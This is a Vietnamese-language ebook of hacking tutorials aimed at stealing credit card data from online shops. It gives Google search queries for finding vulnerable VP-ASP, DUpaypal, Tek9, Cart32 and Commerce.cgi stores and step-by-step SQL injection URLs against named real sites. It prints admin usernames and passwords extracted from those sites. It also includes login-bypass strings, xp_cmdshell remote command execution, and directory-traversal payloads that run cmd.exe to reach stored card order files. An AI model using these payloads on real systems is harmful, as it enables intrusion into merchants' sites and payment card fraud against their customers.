Ebook Hacking Credit Card Written by Hieupc SANGTAOTRE - Com Sua Tam

Ebook nay c viet ra nham muc ch la hoc hoi va chia se kien thc. Email: hieuitpc@yahoo.com Homepage: http://cntt.pro.
vn
Noi dung cua ebook: hai tutorials do hieupc viet va mot vai tutorials khac do anh em bang hu viet, trong o co mot vai tutorials cu nhng cung rat ang c a vao vi muc ch e tham khao.
Hacking Credit Card Version 2.0 --- Written by Hieupc

shopdisplayproducts.asp?cat='
Sau mt thi gian di TTD b chia ct n nay, hieupc mi bt u vit 1 tutorial v hack credit card mi v c l y l tutorial cui cng y nht,c hieupc bin son v su tm t nhiu tutorial c n mi vo 1 ci ebook v tr li nhng cu hi thc mc ca cc bn v hieupc cng lm 1 bn Ebook hacking credit card. No gi chng ta bt u bt u nh. Cch ny cng nh nhng cch thng thng l khai thc theo l i SQL v cng c th p dng cho 1 s li khc nh: OLE DB, JET Database, ASP
Bc 1:
Khuyn co nn search shop www.google.com hoc www.search.com v mnh thy 2 site ny rt very good. T kho nn dng: allinurl:shopdisplayproducts.asp?id= hoc allinurl:shopdisplayproducts.asp?cat=1 hoc allinurl:shopdisplayproducts.asp?cat=2 Search shop theo Domain .com, .net , .biz..: allinurl:.com/shopdisplayproducts.asp?cat=,allinurl:.net/shopdisplayproducts.asp?cat=... Ai bit chm g na th thay vo :) Kh nng ly c credit card: l 99.9 % cn 0.1 % cn li ph thuc vo ci u ca bn. Xong phn search, bn thu hoch li tt c cc shop b li v bt u hack.
Bc 2:
V d: ly v d l 1 site th c dng th ny : http://www.victim.com http://www.victim.com/shopdisplayproducts.asp?id=5 Ta s thm du phy ( ` ) vo sau s 5: http://www.victim.com/shopdisplayproducts.asp?id=5' Xem n c b li khng no, hic n khng b li, ch thy th ny:
Home Improvement Page 1 of 2
Khng sao, chng ta hy bnh tnh nh, thay id bng cat th xem: http://www.victim.com/shopdisplayproducts.asp?id=5' -->>> http://www.victim.com/shopdisplayproducts.asp?cat=5' Uh, n li ru ka:
5' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c. catdescription like '5'%' and hide=0 order by specialoffer desc,cname'. /shop$db.asp, line 467
Okie, tip tc nh, bn s thm on code sau y vo: '%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password

http://www.victim.com/shopdisplayproducts.asp?id=5'
Khi thm xong th s nh th ny: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having% 201=1--sp_password v c th? ny :

5' union select 1 from tbluser"having 1=1--sp_password Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 467
Ch nh cc bn, ci du phy ( ` ) rt quan trng, khng c l khng c. V c th ta c tip tc thm s nh: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having% 201=1--sp_password
http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3%20from%20tbluser"having %201=1--sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3,4%20from% 20tbluser"having%201=1--sp_password C th m tip tc cho n khi bn thy 1 ci bng p p hin ra vi vi con s. y l ti s 47 : http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1--sp_password
3 click to see more 22 4
18 Please review these other products:
No gi chng ta bt u ly user and pass:

fldusername : thay cho s 3 , hay 4, hay 22 tu bn fldpassword : thay cho s 3 , hay 4, hay 22 tu bn
Sau khi thm xong ta s c nh th ny: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1--sp_password V c c username v password :
User: stephenrossi pass: gnilsur
Hoc bn c th gp chung fldusername v fldpassword vo 1 s cng c. http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'% 2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password Ta s c user v pass c gp chung 1 s:
stephenrossi/gnilsur
Bc 3:
Tm link admin, th nh ci ny vo c khng no: http://www.victim.com/shopadmin.asp hic khng c ri. Th ci ny na th xem, may ra n chy n link admin th sao: http://www.victim.com/shopadmin1.asp , cng khng c. Ci ny hieupc download ci source ca VPASP v xem cu trc n th no, v tm ra cu lnh th ny, chng qua l thay table thi. Ta bit table configuration l ni cha nhng thng quan trng ca shop nh l link admin, afftemplateaffiliate, afftemplateMerchant.. Vy cu lnh s th ny: '%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Thay vo ta s c: http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Ta cng thy ci bng:
3 click to see more 22 4
18 Please review these other products:
Ln ny th ta s kim link admin, thng th link admin nm trong fieldvalue , v th ta s t fieldvalue vo s 3, hay 4, hay 22 tu cc bn. '%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password Sau khi thm xong ta s c th ny: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Cc bn s chng thy link admin u ht ton l my con s, lc u hieupc cng tng l mnh lm sai cu lnh, nhng loay hoay 1 i , ko trang ln, ko trang xung, th ra c ti 10 trang.
Page 1 of 10
Ch cn l cc bn thy thi, ni thm l: mi mt trang nh vy l cha nhng thng tin c trong fieldvalue , cc bn c c gng view tng trang nh, hieupc view ht 10 trang v thu thp c nhng link c ui l *.asp:
shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp
Nht nh 1 trong 3 link ny l link admin login , hieupc th ht 3 link v ci link u tin l link admin
shopaddmoretocart.asp
http://www.victim.com/shopaddmoretocart.asp
This site is reserved for Shop Administrators only. Administrator's Login UserName : Password :
By gi ly username v password trn thay vo. Vic cn li chc cc bn bit.
Image Field
THE END
Hacking Credit Card Version 1.0 --- Written by Hieupc

Hack Shop VPASP tht s l nh th no? ( Cp nht v c pht trin thm t nhiu bi vit hng dn trc y ) CCH TH 1: Ci ny chc c l cng c nhiu bn bit, nu mnh on khng lm th ch c 30 %-50 % member l bit cch ny, tuy nhin mnh cng a ln y cho cc bn cha bit v cc bn bit ri hc hi thm mnh hoc gp thm cho mnh ch no cha hon chnh ! Cch ny cng nh nhng cch thng th ng l khai thc theo l i SQL v cng c th p dng cho 1 s li khc nh OLE DB, JET Database, ASP Bc 1: tm site b li kiu ny i hi bn phi c nhiu kinh nghim tm li v search shop nh th no cho tht l hiu qu. Bc ny cng l bc quan trng nht v khng c shop li lm sao hack :)) Khuyn co nn search shop www.google.com hoc www.search.com v mnh thy 2 site ny rt very good. T kho nn dng: allinurl:shopdisplayproducts.asp?id= hoc allinurl:shopdisplayproducts.asp?id=1 hoc allinurl:shopdisplayproducts.asp?id=2 Search shop theo Domain .com, .net , .biz..: allinurl:.com/shopdisplayproducts.asp?id= ; allinurl:.net/shopdisplayproducts.asp?id=... Ai bit chm g na th thay vo :) Xong phn search, bn thu hoch li tt c cc shop b li v bt u hack. By gi mnh ly v d shop ny nh: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1 Oh, 1 em Uk cc ngon khng bit c CC. By gi kim tra xem n li khng bng cch thm vo du phy ( ` ) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1' Oh site b li ka cc bn :
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'. /chris/shop$db.asp, line 868
B?c 2: Ta bt u thm vo on code ny : %20union%20%20select%201%20from%20tbluser%27 Vo pha sau link shop nh b lun ci du phy sau ?id=1 nh, nu khng l khng c u y.
Khi thm xong link s nh th ny: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from% 20tbluser%27 Oh khng d g y :)
Products
Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match. /chris/shop$db.asp, line 868
Cn khng bit qua bc 3 na, nhng khoan cc bn hy xem kinh nghim ca mnh khi thm vo du phy ( ` ) m n hin ra li nh vy:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' '. /product.asp, line 29
Th cc bn hack theo kiu hack c nh. Thui by gi qua bc 3 nh, ni nhiu qu :)) Sau khi hon thnh bc 2, bn s bt u 1 cng vic thing ling nht v cng l mt mi nht, khng mt u ch u oi 1 t, l thm s vo code: 1%20union%20%20select%201,2%20from%20tbluser%27 1%20union%20%20select%201,2,3%20from%20tbluser%27 1%20union%20%20select%201,2,3,4%20from%20tbluser%27.. Khi thm vo th link s nh th ny : http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from% 20tbluser%27
http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4%20from% 20tbluser%27 C thm s tip tc nh, ng nn lng hy c ln. Cho n khi n xut hin 1 ci bng rt p :)) i da, mi tay qu ti s 34 mi hin ra ci bng tri nh ny :)) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser %27 y l bc cui cng ly user and pass: nhng con s quan trng ca shop na l : 3, 4 , 22. fldusername <~ thay vo s 4 fldpassword <~ thay vo s 22 Sau khi thay xong link s nh th ny: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,30,31,32,33,34%20from %20tbluser%27
V cc bn c user and pass ri y:

User: admin848 pass: admin848 User: carste pass: carste
Phn cn li l tm link admin login, ci ny cng kh quan trng v khng c link admin lm sao ly CC :)) Ch : link admin login mc nh ca VPASP l : shopadmin.asp cng c khi ta nh shopadmin1.asp s vo link admin. CCH HACK TH 2 RT RA T BI HNG DN CA ANH HAI Silveryhat_Hacker : Bc 1 tng t nh trn:
V d site ny: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153' cng thm vo du phy ( ` ) check li

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shopping/shopdisplayproducts.asp, line 93
Products Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
Oh c li ri, gi sao y :)) Ci ny anh em bit khai thc ch: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20table_name%20from%20information_schema.tables))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
2 chc cc bn bit, ch l ly table thui, mnh ch vic kim table no ch users ca admin l okie. http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20 ('ver_Faq','coupons','customerprices','customers')))--sp_password
Bc
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Ti y l qu r, ci mnh chnh l table ny : 'AdminUsers' v sao vy v n ch user v pass chc. Thui c khai thc th. Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns% 20where%20table_name=('AdminUsers')))--sp_password Khi thm code xong s nh th ny: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')))-sp_password
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
V bc tip theo: Code : %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns% 20where%20table_name=('AdminUsers')%20and%20column_name%20not%20in%20('AdminID')))--sp_password Khi thm code xong s nh th ny: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID')))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
V cc bn c tip tc thm table vo: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID','login')))--sp_password http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20column_name%20from%20information_schema.columns%20where%20table_name=('AdminUsers')%20and %20column_name%20not%20in%20('AdminID','login','pwd')))--sp_password Okie 2 thng tin quan trng l 'login','pwd' xut hin gi ch vic kim pass: Code: %20and%201=convert(int,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))-sp_password c c shop c khoai: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top% 201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin/admin' to a column of data type int. /shopping/shopdisplayproducts.asp, line 93
Hic hic, user: admin , pass: admin ; bit l shop ny thng admin n ngu n c no By gi kim link admin l nhim v ca bn.
TUTORIALS OF MY FRIENDS OR ORTHER AUTHORS

Tutorial c viet bi kidbandes
What you should look for? (Mc ch ca vic tm li) Tm ra cc trang cho php bn nhp d liu, v d l login page, search page, .... Thnh thong, HTML page s dng "Post" command gi thng s n trang ASP khc. V vy, bn khng th thy thng s trn thanh URL, v xem "FORM" tag trong HTML code. Bn c th tm vi th nh on code sau: <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C> </FORM> Mi th gia <FORM> v </FORM> c thng s li c s dng. What if you can't find any page that takes input? Bn lm g nu khng tm c trang nhp liu no ? Bn nn tm kim trang nh ASP, JSP, CGI, hay PHP. C gng tm cc URL vi cc thng s sau: http://shopping.com/index.asp?id=10 How do you test if it is vulnerable? (Chng ta kim tra li nh th no) Bt u vi 1 du nhy n, thm vo nh sau: hi' or 1=1-Nhp vo login hoc password, hoc ngay c URL. - login: hi' or 1=1-- password: hi' or 1=1-- http://shopping.com/index.asp?id=hi' or 1=1--
Nu bn lm nh th vi 1 gi tr n, phi download source HTML t site, lu vo a cng v chnh sa URL v gi tr n. V d: <form action=http://shopping.com/search/search.asp method=post> <input type=hidden name=A value="hi' or 1=1--"> </form> Nu may mn th trn site ca bn, bn s ly c ng nhp nhng khng co tn ng nhp v mt m Nhng ti sao dng 'or 1=1-- ? Chng ta xem 1 v d khc ti sao ' or 1=1-- li quan trng. Khc vi vic vt ng nhp, n c th xem nhiu d liu hn l vi cc thng tin thng thng. Ly 1 trang ASP bn s thy ci link nh sau: http://shopping.com/index.asp?category=food Trong URL, 'category' l 1 tn bin, v 'food' l gi tr gn cho bin . Trong trng
hp , 1 trang ASP c th cha cc on code sau (OK, y l on code c vit ra cho bi vit ny): v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.execute(sqlstr Nh chng ta thy, bin s c gi tr v_cat bn trong v v vy cu lnh SQL s tr thnh: SELECT * FROM product WHERE PCategory='food' Cu lnh truy vn trn s a ra tt c cc gi tr vi iu kin l field PCategory l 'food'. By gi cu truy vn s nh th ny: http://shopping.com/index.asp?category=food' or 1=1-By gi, gi tr ca v_cat s l "food' or 1=1-- ", nu chng ta chuyn i thnh cu lnh SQL, chng ta s c: SELECT * FROM product WHERE PCategory='food' or 1=1--' Cu truy vn s lc ra cc gi tr trong ct PCategory vi cc gi tr l 'food'. Du "--" s b qua cc truy vn ca MSSQL . Thnh thong chng ta cng c th s dng du "#". Tuy nhin, nu h thng khng co MSSQL hoc ch n gin la truy vn bnh thng ta ch cn s dng or 'a'='a Cu lnh SQL s l : SELECT * FROM product WHERE PCategory='food' or 'a'='a' Ph thuc vo cu truy vn, ta s dng cc gi tr sau: ' or 1=1-" or 1=1-or 1=1-' or 'a'='a " or "a"="a ') or ('a'='a
How do I get remote execution with SQL injection? (Phng php thc thi lnh t xa vi SQL) c th inject(nhp thm) 1 lnh SQL, chng ta c th thc hin lnh. Ci t mc nh trn MS SQL chy di quyn SYSTEM, l user vi quyn truy cp Aministrator. Chng ta c th s dng lu tr master..xp_cmdshell thc hin lnh t xa: '; exec master..xp_cmdshell 'ping 10.10.1.2'-Th du (") nu du (') khng lm vic. Hai du tr cui dng lnh cho php thc hin mt lnh SQL mi. kim tra rng cu lnh ny thc hin c, bn c th lng nghe cc gi tin ICMP t 10.10.1.2, kim tra bt k gi tin no t server: #tcpdump icmp Nu bn khng nhn c bt k gi tin t server, v nhn 1 thng bo li l khng c quyn, th c th Administrator gii hn quyn ngi dng truy cp vo h thng. How to get output of my SQL query?(Phng php Ly kt qu t cu truy vn SQL) Nu c th, bn s dng sp_makewebtask vit cu truy vn thnh cu lnh HTML: '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA. TABLES" Nhng a ch IP phi c th mc c share cho tt c mi ngi How to get data from the database using ODBC error message (Phng php Ly d liu t CSDL s dng li ODBC) Chng ta s dng th tc b li trong Server MS SQL thc hin lnh. Xem v d sau: http://shopping.com/index.asp?id=10 Chng ta c gng kt hp UNION trong '10' vi 1 cu lnh khc: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES-Bng h thng INFORMATION_SCHEMA.TABLES cha thng tin ca tt c cc bng trong h thng. TABLE_NAME field cha tt c cc tn ca bng trong h thng. N lun lun tn ti theo cch mc nh. Cu truy vn s l:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-iu ny se tr v bng u tin trong bng INFORMATION_SCHEMA_TABLES. Khi chng ta UNION gi tr ny vi s nguyn 10, MS SQL Server s c gng chuyn i gi tr chui (nvarchar) thnh 1 s nguyn. Th tc ny b li, bi v khng th thc hin chuyn i t nvarchar thnh int. Server s xut hin li sau: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5 Thng bo li bit c l khng th chuyn i gi tr chui thnh s. Trong trng hp ny, chng ta c th ly c tn table u tin l "table1". ly table tip theo ta c th s dng lnh sau: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES WHERE TABLE_NAME NOT IN ('table1')-Chng ta cng c th s dng n bng lnh LIKE: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. TABLES WHERE TABLE_NAME LIKE '%25login%25'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. /index.asp, line 5 Gi tr trong ph hp, '%25login%25' s c xem nh l %login% trong SQL Server. Trong trng hp ny, ta c th ly tn u tin trong table c gi tr ph hp l, "admin_login". How to mine all column names of a table? (Cch ly tt c tn ct trong table) Chng ta c th s dng table khc INFORMATION_SCHEMA.COLUMNS nh x tt c cc ct ca table: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int. /index.asp, line 5 By gi chng ta c ct u tin trong table, chng ta s dng NOT IN () ly ct tip theo: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. /index.asp, line 5 Khi chng ta tip tc c th s thu c mt s ct cn thit nh l "password", "details". Chng ta s bit c ni dung khi s dng cu truy vn sau: Quote: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')-Output: Quote: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 5 How to retrieve any data we want? (phng php ly tt c d liu mnh mun) By gi chng ta s xem xt 1 s table quan trng, v cc field ca n, Chng ta cng s dng cng k thut trn ly d liu cn thit trong CSDL . By gi chng ta ly gi tr u tin trong ct login_name t bng "admin_login": http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'kidbandes' to a column of data type int. /index.asp, line 5 Tn ca user admin l "kidbandes". Cui cng chng ta ly thm password ca "kidbandes" trong CSDL http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='kidbandes'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'loverthu' to a column of data type int. /index.asp, line 5 by gi chng ta c th ng nhp vi tn "kidbandes" v password "lovethu". How to get numeric string value? (phng php ly gi tr chui s&#7889 C 1 s gii hn trong k thut trn. Chng ta khng th ly c bt k cu lnh li no nu chng ta chuyn i kiu chui thnh bt k kiu s no (cc ki t 0-9). Chng ta c gng ly password ca "kimthu" m n l s "123456": http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'-Thng thng chng ta s nhp c thng bo l "Page Not Found". Nguyn nhn y l password ca "kimthu" l "123456" s khng th chuyn i, trc UNION vi 1 s (10 in this case). bi v y l 1 cu lnh UNION ng, SQL server s khng qung li ODBC, v v vy chng ta s khng th ly c thng bo li. gii quyt vn ny, Chng ta c th dng mt ki tu chui lm cho cu lnh truy vn li. Chng ta c gng thc hin cu truy vn sau: http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20anhyeuem') FROM admin_login where login_name='trinity'-Chng ta s dng du (+) kt hp password vi 1 gi tr chui m chng ta mun. (ASSCII code for '+' = 0x2b). Chng ta s kt hp vi '(space)morpheus' thnh 1 password thc. V vy, ngay c vi password l mt chui s '123456', N cng s tr thnh '123456 anhyeuem' bng cch n gin gi lnh convert(), sau c gng chuyn i '123456 anhyeuem' thnh 1 s, SQL Server s xut hin li ODBC:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '123456 anhyeuem' to a column of data type int. /index.asp, line 5 How to update/insert data into the database? (phng php Update/Insert d liu vo CSDL) Khi chng ta thnh cng trong vic thu thp thng tin t CSDL, iu ny c ngha chng ta c th UPDATE hoc ngay c INSERT mt record mi trong table. V d chng ta c th thay password ca "kidbandes": http://shopping.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'lovethu' WHERE login_name='kidbandes'- INSERT d liu mi vo CSDL: http://shopping.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'kidbandes2','lovethu','NA')-By gi chng ta c th ng nhp vi "kidbandes2" v password "lovethu". date : 29/05/2005 TG kidbandes newbie of Thecorrs Family
Mc nguy him : kh cao t l thnh cng :80% Tool :+ site http://google.com.vn/ + PC ca bn ci Access ( dng xem file .mdb) Hin cc Shop DUpaypal rt nhiu v hu nh cha fix c my bng chng l tn cng 10 site th 8 site dnh :D) Tin hnh: Ln http://google.com.vn/ Search vi t kha "Powered by DUpaypal -siteduware.com" bn s thy rt nhiu site dnh Bug ny, Chn victim test no y kieptinhchung chn ci ny: http://www.xcel-leadership.com/sermon/deta...ro=147&iType=18 bi gi thm vo sau N : ../_private/DUpaypal.mdb Dowload file cha thng tin v U/P ca Admin v , tc l ta s dng link sau dowload n: http://www.xcel-leadership.com/sermon/_private/DUpaypal.mdb sau khi dowload v bn s xem N di dng Accees, tm phn User v ly user+pass ng nhp tht d dng , nh vy l bn lm ch Shop roi .
TUTORIAL FORM jonnyhackstuff
TUTORIAL BY HCEGROUP
I-Li Tek9.asp : Cch thc tm : Dng Google Cu tm kim : tek9.asp Kt qu : Bn tm cc trang web hin ln , v d lhttp://198.170.250.68/ tek9_login.asp Bn s thm intranet trc tek9.asp http://198.170.250.68/intranet/tek9_login.asp c g ? Bn vo trang ng nhp ca ngi qun tr. Tn v mt khu : u l 'or''=' Sau ? Bn t tm hiu v mi trang c 1 s trnh by hi khc nhau. Trang trn cho php bn qun l thng s , kiu , cch thc v vi ch c lin quan n c s d liu cha th tn dng. Ngai ra bn c th tm lnh Find orders truy tm khu vc chc th. ============================ II-Li Cart32 v3.5a Cch thc tm : Dng Google Cu tm kim : Cart32 v3.5a Kt qu : Chy cc trang web c tp tin cart32.exe . Bn s nhn c 1 s thng tin c g ? Cha c g ht Tn v mt khu : Khng cn Sau ? Gi s bn kim c trang web sau c li http://www.connectionsmall.com/scripts/cart32.exe/ Bn thay t card32.exe bng nhng dng sau y : I) ..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ II) ..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ III) ..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ V d : http://www.connectionsmall.com/scripts/........../winnt/system32/cmd.exe?/c+dir+c:\
-Nu khng chuyn g xy ra th bn thm dng a ch sau vo cui cng ly th tn dng : \progra~1\MWAInc\Cart32\ -Bn s thy nhng dng ging nh sau : 2814659000-001001.c32 2814659000-001002.c32 2814659000-001003.c32 -By gi tt nhng g cn phi lm l bn thm 1 trong ba hoc th th dng tng ci vo cui a ch trn. Sau cng ta s c ging nh th ny : http://www.connectionsmall.com/scripts/........../winnt/system32/cmd.exe?/c+dir+c:\progra~1\MWAInc \Cart32\2814659000-001001.c32
============================
III-Li Commerce.cgi Cch thc tm : Dng Google Cu tm kim : Commerce.cgi Kt qu : Chy cc trang web c tp tin Commerce.cgi. Gi s bn kim c trang web sau c li http://www.warresisters.org/store/commerce.cgi Bn thay t commerce.cgi bng admin_files/commerce_user_lib.pl V d : http://www.warresisters.org/store/admin_files/commerce_user_lib.pl Bn s nhn c 1 s thng tin : $sc_sales_tax = ".0825"; $sc_sales_tax_state = "NY"; $sc_send_order_to_email = "yes"; $sc_order_log_name = "onlinebookstore.log"; $sc_send_order_to_log = "yes";
